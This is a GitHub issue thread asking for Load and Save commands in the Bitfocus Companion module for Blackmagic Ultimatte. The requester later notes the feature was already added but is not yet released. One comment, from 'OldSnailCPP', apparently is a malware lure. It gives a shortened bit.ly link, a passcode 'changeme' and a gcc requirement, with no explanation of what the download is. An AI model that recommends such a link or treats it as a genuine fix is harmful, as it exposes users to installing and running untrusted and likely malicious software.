### ISSUE TITLE
Feature Request:  Add "Load" and "Save"

### ISSUE THREAD

**Issue by paulbuchan** [bitfocus/companion-module-bmd-ultimatte#11]
It would be extremely helpful to have the options of Load and Save added to the module. Below is the screenshot of the manual that references the commands. It's also on page 90 of the manual which is linked below. For my use case, Load is more valuable, but I figured if you're adding one, the other isn't that much more work. 

<img width="553" alt="Screenshot 2024-09-05 at 09 41 06" src="https://github.com/user-attachments/assets/1284a936-0d3e-431c-83da-1ce12ddcf61d">

[Latest Manual](https://documents.blackmagicdesign.com/UserManuals/UltimatteManual.pdf?_v=1662620411000
)

Let me know if you need any additional information.

**Comment by OldSnailCPP** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by paulbuchan** [comment]
Apologies. It looks like this was already added, it's just not in the current release.
